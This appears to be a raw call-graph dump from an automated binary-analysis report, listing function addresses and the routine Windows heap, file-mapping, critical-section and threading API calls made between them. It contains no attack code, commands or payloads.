Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67624->67664 67627->67624 67628 1091a91 67627->67628 67630 1091b38 67627->67630 67629 1091aa5 67628->67629 67655 10914a0 382 API calls 2 library calls 67628->67655 67631 1091ae1 67629->67631 67633 1091ac1 67629->67633 67656 10914a0 382 API calls 2 library calls 67629->67656 67630->67631 67638 1091b05 67630->67638 67659 105a280 SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67630->67659 67636 1091e71 HeapFree 67631->67636 67643 1091e88 67631->67643 67633->67631 67637 1091add 67633->67637 67657 10914a0 382 API calls 2 library calls 67633->67657 67636->67636 67636->67643 67637->67631 67658 10917b0 401 API calls 2 library calls 67637->67658 67638->67631 67648 121fd80 67638->67648 67642->67622 67643->67642 67644 1091ebc HeapFree 67643->67644 67644->67642 67647 1091b14 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67647->67624 67647->67631 67660 1093440 397 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67647->67660 67661 1059fa0 67647->67661 67649 121fd94 67648->67649 67652 121fdec 67648->67652 67650 121fdc5 HeapAlloc 67649->67650 67651 121fdac GetProcessHeap 67649->67651 67649->67652 67653 121fe03 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67650->67653 67654 121fdda 67650->67654 67651->67650 67652->67647 67653->67647 67654->67649 67655->67629 67656->67633 67657->67637 67658->67638 67659->67638 67660->67647 67665 1059c20 67661->67665 67671 1059c56 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67665->67671 67666 1059e00 67677 1059a20 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67666->67677 67667 1059c73 67668 1059c81 67667->67668 67674 1059cdc Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67667->67674 67670 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67668->67670 67673 1059c88 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67670->67673 67671->67666 67671->67667 67672 1059e42 67671->67672 67672->67647 67673->67672 67678 11517d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67673->67678 67676 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67674->67676 67676->67673 67677->67673 67678->67672 66493 5aad070 66494 5aad083 66493->66494 66495 5aad112 Sleep 66494->66495 66496 5aad09b 66494->66496 66495->66496 66497 10a8ed0 66519 fcdd00 66497->66519 66502 10a8f3e 66504 10a8f56 66502->66504 66508 10a8f9a 66502->66508 66527 125b100 390 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66504->66527 66506 10a8f68 66528 fc5bc0 928 API calls 2 library calls 66506->66528 66513 10a8fcc 66508->66513 66530 fc5d40 66508->66530 66509 10a8f89 66529 125b3b0 398 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66509->66529 66518 10a8f98 66513->66518 66540 1060170 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66513->66540 66516 10a9000 66517 14ab398 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RtlFreeHeap 66516->66517 66517->66518 66541 fcdb70 66518->66541 66520 fcdb70 382 API calls 66519->66520 66521 fcdd37 66520->66521 66522 10a9a50 66521->66522 66523 10a9a66 66522->66523 66548 1029b80 66523->66548 66526 10ab010 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66526->66502 66527->66506 66528->66509 66529->66518 66531 fc5d92 66530->66531 66533 fc5db8 66530->66533 66560 fc6020 66531->66560 66536 fc6020 928 API calls 66533->66536 66534 fc5d9a 66535 14ab38a _ValidateLocalCookies 5 API calls 66534->66535 66537 fc5db2 66535->66537 66538 fc5e29 66536->66538 66537->66513 66614 10aed60 66538->66614 66540->66516 66545 fcdbac 66541->66545 66542 fcdceb 66543 14ab38a _ValidateLocalCookies 5 API calls 66542->66543 66546 fcdcf8 66543->66546 66544 fcdc8c EventWrite 67606 11679c0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66544->67606 66545->66542 66545->66544 66549 1029bb3 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66548->66549 66551 1029bfe 66549->66551 66557 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66549->66557 66550 1029ce4 66553 1029d01 66550->66553 66558 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66550->66558 66551->66550 66555 1029d03 66551->66555 66553->66502 66553->66526 66555->66553 66559 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66555->66559 66557->66551 66558->66553 66559->66553 66561 fc607e 66560->66561 66562 fc609d 66560->66562 66561->66562 66668 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66561->66668 66642 fc6b80 66562->66642 66565 fc60b9 66566 fc64dc 66565->66566 66568 fc60c3 66565->66568 66683 10029e0 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66566->66683 66577 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66568->66577 66569 fc64eb 66684 fc73d0 392 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66569->66684 66570 fc6463 66681 10a84c0 381 API calls 2 library calls 66570->66681 66573 fc64b8 66682 fc73d0 392 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66573->66682 66574 fc6505 66576 fc6522 66574->66576 66685 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66574->66685 66576->66534 66579 fc6113 66577->66579 66578 fc64cb 66578->66574 66582 fc6524 66578->66582 66581 fc6130 66579->66581 66669 1002800 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66579->66669 66585 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66581->66585 66586 fc6170 66581->66586 66582->66576 66686 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66582->66686 66585->66586 66587 fc6b80 382 API calls 66586->66587 66600 fc61d8 66586->66600 66588 fc61a2 66587->66588 66592 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66588->66592 66588->66600 66589 fc6278 LeaveCriticalSection 66596 fc6289 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66589->66596 66590 fc62c5 66649 fc6560 66590->66649 66591 fc62d2 66671 10029e0 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66591->66671 66595 fc61b7 66592->66595 66595->66600 66670 fca5e0 InitializeCriticalSection 66595->66670 66596->66590 66596->66591 66598 fc63ee LeaveCriticalSection 66606 fc6402 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66598->66606 66599 fc62ce 66602 fc632c 66599->66602 66604 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66599->66604 66613 fc63b1 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66599->66613 66600->66589 66600->66596 66601 fc644e 66601->66569 66601->66570 66672 fcfe20 66602->66672 66604->66602 66606->66601 66680 fcb4b0 391 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66606->66680 66609 fc6382 66679 fd7c30 384 API calls _ValidateLocalCookies 66609->66679 66611 fc6393 66612 fc639d LeaveCriticalSection 66611->66612 66611->66613 66612->66613 66613->66598 66613->66606 66615 10aed6a 66614->66615 66620 10aedb3 66614->66620 66617 10aed77 66615->66617 67322 1010470 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66615->67322 66618 115dbc0 GetLastError 66617->66618 66617->66620 66621 10aed9f Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66617->66621 66619 115de02 SetLastError 66618->66619 66629 115dbe7 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66618->66629 66619->66534 66620->66534 66621->66620 66622 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 376 API calls 66621->66622 66623 115dfe4 66621->66623 66622->66623 66626 115e048 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66623->66626 67335 115f900 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66623->67335 66625 115e019 SetEvent 66625->66626 66627 115e02d 66625->66627 66626->66620 66628 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 376 API calls 66626->66628 66627->66626 67336 115f6b0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66627->67336 66628->66620 66629->66619 66630 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 376 API calls 66629->66630 66633 115dc78 66629->66633 66630->66633 66634 115ddd9 66633->66634 66636 115ddc1 SleepEx 66633->66636 66637 115ddcb SwitchToThread 66633->66637 66639 115de10 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66633->66639 67323 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66633->67323 67324 1159e10 WaitForSingleObjectEx 66633->67324 66635 115ddfb 66634->66635 66638 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 376 API calls 66634->66638 66635->66619 66636->66637 66637->66633 66638->66635 67325 10d4ef0 66639->67325 66643 fc6c0f 66642->66643 66645 fc6bb9 66642->66645 66687 fc9510 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66643->66687 66645->66565 66647 fc6c5e 66648 fc6cac 66647->66648 66688 fc9510 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66647->66688 66648->66565 66650 fc65c7 66649->66650 66652 fc65ae 66649->66652 66653 fc667c 66650->66653 66689 fc57f0 66650->66689 66651 fc65c2 66651->66599 66652->66651 66720 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66652->66720 66656 fc66ad 66653->66656 66721 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66653->66721 66656->66651 66722 1002a30 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66656->66722 66659 fc6705 66723 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66659->66723 66662 fc6623 66662->66653 66666 fc57f0 383 API calls 66662->66666 66698 fc67d0 66662->66698 66719 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66662->66719 66666->66662 66668->66562 66669->66581 66670->66600 66671->66599 66673 fcfe29 66672->66673 66674 fc6366 66672->66674 66675 fcfe3b Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66673->66675 66676 1215d00 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66673->66676 66678 12199e0 5 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66674->66678 66675->66674 66677 fcfe5d HeapFree 66675->66677 66676->66675 66677->66674 66678->66609 66679->66611 66680->66601 66681->66573 66682->66578 66683->66601 66684->66578 66685->66576 66686->66576 66687->66647 66688->66647 66690 fc5888 66689->66690 66691 fc5822 66689->66691 66690->66662 66724 108b4c0 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66691->66724 66693 fc582a 66693->66690 66694 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66693->66694 66695 fc584b 66694->66695 66696 fc589e 66695->66696 66725 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66695->66725 66696->66662 66699 fc6833 66698->66699 66700 fc68cf 66699->66700 66701 fc6861 66699->66701 66726 1002c90 66700->66726 66702 fc6871 66701->66702 66779 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66701->66779 66705 1002c90 928 API calls 66702->66705 66706 fc688a 66705->66706 66708 fc57f0 383 API calls 66706->66708 66714 fc68af 66706->66714 66710 fc689b 66708->66710 66709 fc6918 66711 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66709->66711 66710->66709 66710->66714 66780 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66710->66780 66715 fc6924 66711->66715 66712 fc68e3 66712->66709 66713 fc6902 66712->66713 66781 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66712->66781 66775 10032c0 66713->66775 66774 fc58c0 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66714->66774 66715->66662 66719->66662 66722->66659 66724->66693 66725->66690 66727 1002ce6 66726->66727 66728 1002cc6 66726->66728 66730 1002f96 66727->66730 66732 1002de1 66727->66732 66733 1002f01 66727->66733 66734 1002ef4 66727->66734 66735 1002dc8 66727->66735 66736 1002eea 66727->66736 66737 1002f0b 66727->66737 66738 1002cfc 66727->66738 66751 1002d01 66727->66751 66754 1002d06 66727->66754 66729 14ab38a _ValidateLocalCookies 5 API calls 66728->66729 66731 1002ce0 66729->66731 66731->66714 66732->66751 66752 1002e02 66732->66752 66753 1002ede 66732->66753 66806 1002fe0 384 API calls 66733->66806 66805 fe35b0 482 API calls 2 library calls 66734->66805 66735->66751 66794 fdddc0 396 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66735->66794 66804 1003370 662 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66736->66804 66807 fe0660 400 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66737->66807 66791 10031f0 384 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66738->66791 66742 1002d71 66792 fe09a0 384 API calls 66742->66792 66746 1002f13 66808 fdf540 384 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66746->66808 66748 1002efc 66748->66751 66749 1002db4 66793 1220eb0 RtlFreeHeap Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66749->66793 66751->66730 66759 1002e72 66751->66759 66760 1002f68 66751->66760 66757 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66752->66757 66756 fe4240 928 API calls 66753->66756 66754->66742 66782 fd1fe0 66754->66782 66756->66751 66761 1002e10 66757->66761 66762 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66759->66762 66760->66730 66810 1123a20 388 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66760->66810 66769 1002e21 66761->66769 66798 fe4240 66761->66798 66766 1002e83 66762->66766 66765 1002f1b Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66765->66751 66809 1055860 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66765->66809 66770 1002ea1 66766->66770 66796 1124d30 394 API calls 66766->66796 66795 fd0090 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66769->66795 66797 fd0090 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66770->66797 66772 1002eb3 66772->66714 66774->66712 66776 100331c 66775->66776 67251 fc85b0 66776->67251 66779->66702 66780->66714 66781->66713 66783 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66782->66783 66785 fd2016 66783->66785 66784 fd20e9 66811 fd1a70 66784->66811 66785->66784 66788 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66785->66788 66788->66784 66789 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66790 fd214b 66789->66790 66790->66742 66791->66751 66792->66749 66793->66751 66794->66751 66795->66751 66796->66770 66797->66772 66802 fe4261 66798->66802 66799 fe434c 67129 1416e50 24 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66799->67129 66801 fe4368 66801->66769 66802->66799 67093 10410a0 66802->67093 66804->66751 66805->66748 66806->66751 66807->66746 66808->66765 66809->66751 66810->66730 66814 fd1abc 66811->66814 66812 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66813 fd1aee 66812->66813 66835 1134450 66813->66835 66814->66812 66816 fd1b5e InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 66845 105f6d0 66816->66845 66819 fd1c98 66821 fd1cff 66819->66821 66823 fd1ca4 66819->66823 66820 fd1be0 66822 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66820->66822 66866 fccef0 66821->66866 66826 fd1bf7 66822->66826 66825 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66823->66825 66828 fd1cbb 66825->66828 66827 fdd800 469 API calls 66826->66827 66830 fd1c8c 66827->66830 66878 fdd800 66828->66878 66832 fd1dbc 66830->66832 66886 fd2ee0 66830->66886 66833 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66832->66833 66834 fd1e26 66832->66834 66833->66834 66834->66789 66837 1134483 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66835->66837 66836 11344da 66927 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66836->66927 66837->66836 66839 11344a5 66837->66839 66840 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66839->66840 66841 11344b5 66840->66841 66841->66816 66846 105f705 66845->66846 66847 105f75b 66845->66847 66928 1061a40 66846->66928 66848 14ab38a _ValidateLocalCookies 5 API calls 66847->66848 66850 fd1bd6 66848->66850 66850->66819 66850->66820 66851 105f70c 66852 105f80e 66851->66852 66853 105f73b 66851->66853 66946 105ff40 462 API calls 66851->66946 66950 10b14a0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66852->66950 66855 1061a40 462 API calls 66853->66855 66859 105f745 66855->66859 66858 105f72f 66858->66853 66860 105f775 66858->66860 66859->66847 66859->66852 66947 fd6240 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66860->66947 66862 105f7e5 66948 fcd710 13 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66862->66948 66864 105f7fb 66949 1017c60 389 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66864->66949 66867 fccf2c 66866->66867 66868 fccf32 66866->66868 67035 10e27a0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66867->67035 67031 1220c10 66868->67031 66871 fccf4c 66872 fccfcb 66871->66872 66873 fccf50 66871->66873 66874 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 66872->66874 66875 fccf73 LeaveCriticalSection 66873->66875 66877 fccf81 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66873->66877 66876 fccfd0 66874->66876 66875->66877 66877->66828 66879 fdd86d 66878->66879 66880 fdd849 66878->66880 67036 fde1c0 66879->67036 66881 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66880->66881 66881->66879 66882 fdd8d0 66883 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66882->66883 66884 fdd8dc 66883->66884 66884->66830 66887 fd2f4a 66886->66887 66888 fd304c 66887->66888 66889 fd2f54 66887->66889 67092 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66888->67092 66890 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66889->66890 66897 fd2f6b 66890->66897 66895 fd2fab LeaveCriticalSection 66899 fd2fbd Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66895->66899 66897->66895 66900 ff6a60 387 API calls 66897->66900 66898 fd3019 66901 14ab38a _ValidateLocalCookies 5 API calls 66898->66901 66899->66898 66906 fd300a HeapFree 66899->66906 66900->66897 66903 fd3046 66901->66903 66903->66832 66906->66898 66931 1061a79 66928->66931 66929 1061bee 66929->66851 66930 1061ac3 66935 1061aee 66930->66935 66981 11517d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66930->66981 66931->66929 66931->66930 66980 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66931->66980 66934 1061b6a 66936 1061b9c 66934->66936 66942 1061bcf 66934->66942 66935->66934 66937 1061b47 66935->66937 66951 1061c20 66935->66951 66938 1061bb9 66936->66938 67029 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66936->67029 66937->66934 66940 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66937->66940 66938->66851 66941 1061b54 66940->66941 66941->66934 66982 141ad60 66941->66982 66942->66938 67030 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66942->67030 66946->66858 66947->66862 66948->66864 66949->66852 66952 121ae20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 28 API calls 66951->66952 66953 1061c5e 66952->66953 66954 1061d31 66953->66954 66955 1061c95 66953->66955 66956 141a3d0 449 API calls 66954->66956 66957 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock GetProcessHeap RtlAllocateHeap RaiseException 66955->66957 66960 1061cb9 66956->66960 66958 1061c9c 66957->66958 66958->66960 66961 141abc0 387 API calls 66958->66961 66959 1061d2f 66959->66937 66960->66959 66962 fcd710 13 API calls 66960->66962 66961->66960 66963 1061d85 66962->66963 66964 10b1600 382 API calls 66963->66964 66965 1061d91 66964->66965 66966 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock GetProcessHeap RtlAllocateHeap RaiseException 66965->66966 66967 1061dd3 66966->66967 66968 1061de4 66967->66968 66969 1061def 66967->66969 66970 10618c0 462 API calls 66968->66970 66972 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock GetProcessHeap RtlAllocateHeap RaiseException 66969->66972 66971 1061deb 66970->66971 66971->66969 66973 1061e1b 66972->66973 66974 1061e37 66973->66974 66975 1061e29 66973->66975 66978 1061e53 66974->66978 66979 11517d0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66974->66979 66976 141b240 395 API calls 66975->66976 66977 1061e33 66976->66977 66977->66974 66978->66937 66979->66978 66980->66930 66981->66935 66983 1062190 389 API calls 66982->66983 66984 141ae13 66983->66984 66985 1128840 GetFileSize GetLastError SetLastError SetLastError 66984->66985 66989 141ae59 66984->66989 66987 141ae3c 66985->66987 66986 141b063 66986->66934 66987->66989 66990 141ae4b GetLastError 66987->66990 66988 141ae90 CreateFileMappingW 66991 141aeaa 66988->66991 66992 141aeb7 66988->66992 66989->66986 66989->66988 66990->66989 66993 141b0b6 66990->66993 66991->66992 66994 141aeb0 CloseHandle 66991->66994 66992->66993 66995 141aed4 MapViewOfFileEx 66992->66995 66996 1219520 GetLastError RaiseException 66993->66996 66994->66992 66997 141b0a4 GetLastError 66995->66997 66998 141af18 66995->66998 66999 141b0bb 66996->66999 66997->66993 67002 141b0ae SetLastError 66997->67002 67000 141af29 66998->67000 67001 141af1e UnmapViewOfFile 66998->67001 67003 1219250 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66999->67003 67000->66986 67005 141af52 CreateFileMappingW 67000->67005 67001->67000 67002->66993 67004 141b0c5 67003->67004 67006 141b120 67004->67006 67007 141b119 CloseHandle 67004->67007 67005->66993 67010 141af86 67005->67010 67008 141b13b UnmapViewOfFile 67006->67008 67009 141b14a 67006->67009 67007->67006 67008->67009 67011 141b165 67009->67011 67014 14ab398 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RtlFreeHeap 67009->67014 67012 10978a0 MapViewOfFileEx GetLastError SetLastError 67010->67012 67011->66934 67013 141af97 67012->67013 67013->66993 67015 1465d10 11 API calls 67013->67015 67014->67011 67016 141afc1 67015->67016 67016->66999 67017 141b091 67016->67017 67020 141afef 67016->67020 67018 1465dd0 free 67017->67018 67019 141b09a 67018->67019 67021 1219250 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67019->67021 67022 1465dd0 free 67020->67022 67021->66997 67023 141aff8 67022->67023 67024 141b016 67023->67024 67025 141b00a UnmapViewOfFile 67023->67025 67026 141b036 67024->67026 67027 141b02f CloseHandle 67024->67027 67025->67024 67026->66986 67028 141b055 CloseHandle 67026->67028 67027->67026 67028->66986 67029->66938 67030->66929 67032 1220c44 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67031->67032 67033 14ab398 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RtlFreeHeap 67032->67033 67034 1220d72 67032->67034 67033->67032 67034->66871 67035->66868 67037 fde3e2 67036->67037 67040 fde222 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67036->67040 67038 14ab38a _ValidateLocalCookies 5 API calls 67037->67038 67039 fde405 67038->67039 67039->66882 67041 fde40e 67040->67041 67042 fde2e9 67040->67042 67044 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 67041->67044 67043 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67042->67043 67050 fde2fd 67043->67050 67047 fde413 6 API calls 67044->67047 67065 fe0a60 67047->67065 67048 14ab398 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RtlFreeHeap 67048->67050 67049 fde578 67052 1061a40 462 API calls 67049->67052 67063 fde5c6 67049->67063 67050->67037 67050->67048 67051 fde68d 67053 fde6a8 67051->67053 67078 1094660 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67051->67078 67052->67063 67057 fde6c3 67053->67057 67079 102ecc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67053->67079 67058 fde714 67057->67058 67080 fe5120 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67057->67080 67060 fde734 67058->67060 67081 121ae20 67058->67081 67062 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67060->67062 67064 fde756 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67060->67064 67062->67064 67063->67051 67073 fed9a0 67063->67073 67064->66882 67066 fe0a77 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67065->67066 67067 fe0d9f 67066->67067 67068 fe0c75 67066->67068 67070 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 67067->67070 67069 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67068->67069 67071 fe0c82 67069->67071 67072 fe0da4 67070->67072 67071->67049 67072->67049 67074 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67073->67074 67075 fed9d7 67074->67075 67076 fee7b0 381 API calls 67075->67076 67077 fed9fe 67076->67077 67077->67051 67078->67053 67079->67057 67080->67058 67082 121a870 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 23 API calls 67081->67082 67083 121ae6e 67082->67083 67084 121aef7 67083->67084 67085 121ae8e _errno wcstoul _errno 67083->67085 67086 121af15 67084->67086 67088 121af06 HeapFree 67084->67088 67085->67084 67087 121aeb9 67085->67087 67086->67060 67087->67084 67089 121aebe 67087->67089 67088->67086 67090 121aec9 HeapFree 67089->67090 67091 121aedf 67089->67091 67090->67091 67091->67060 67105 104110e 67093->67105 67094 1041191 67095 10411cc 67094->67095 67110 1042b30 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67094->67110 67096 10413e5 67095->67096 67097 1041247 67095->67097 67098 10411e1 67095->67098 67099 104121c 67095->67099 67100 104147a 67095->67100 67113 10415b8 67095->67113 67121 1041418 67095->67121 67156 104b9e0 67096->67156 67155 109f510 409 API calls 67097->67155 67130 109eca0 67098->67130 67135 109ed50 67099->67135 67103 109ed50 928 API calls 67100->67103 67108 1041416 67103->67108 67105->67094 67138 fe40e0 928 API calls 